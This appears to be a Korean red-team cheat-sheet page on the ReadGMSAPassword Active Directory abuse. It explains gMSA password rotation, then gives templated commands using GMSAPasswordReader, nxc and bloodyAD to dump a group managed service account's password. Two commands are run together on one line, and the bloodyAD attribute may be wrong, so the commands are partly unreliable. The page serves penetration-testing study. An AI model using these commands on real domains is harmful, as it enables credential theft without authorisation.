ReadGMSAPassword
gMSA(Group Management Service Account)는 MSA의 확장판으로 여러 컴퓨터에서 공유 가능한 도메인 서비스 계정의 패스워드를 관리하는 서비스입니다.
LAPS와 동일하게 관리자가 직접 패스워드를 관리하는 대신, 도메인 컨트롤러가 주기적으로 랜덤한 난수 값으로 패스워드를 관리합니다.
gMSA에 대해 읽기 권한이 있는 계정은 gMSA에 저장된 패스워드를 읽을 수 있습니다.
Practice
# gMSA 덤프 도구 설치
https://github.com/rvazarkar/GMSAPasswordReader
# gMSA 덤프
gmsapasswordreader.exe --accountname '<username>'# gMSA 덤프 via nxc
nxc ldap '<dc-ip>' -u '<username>' -p '<password>' --gmsa
# gMSA 덤프 via bloodyAD
bloodyAD --host '<dc-fqdn>' -d '<domain>' -u '<username>' -p '<password>' --dc-ip '<dc-ip>' -k get object '<target>' --attr msDS-ManagedPasswordReferences
Last updated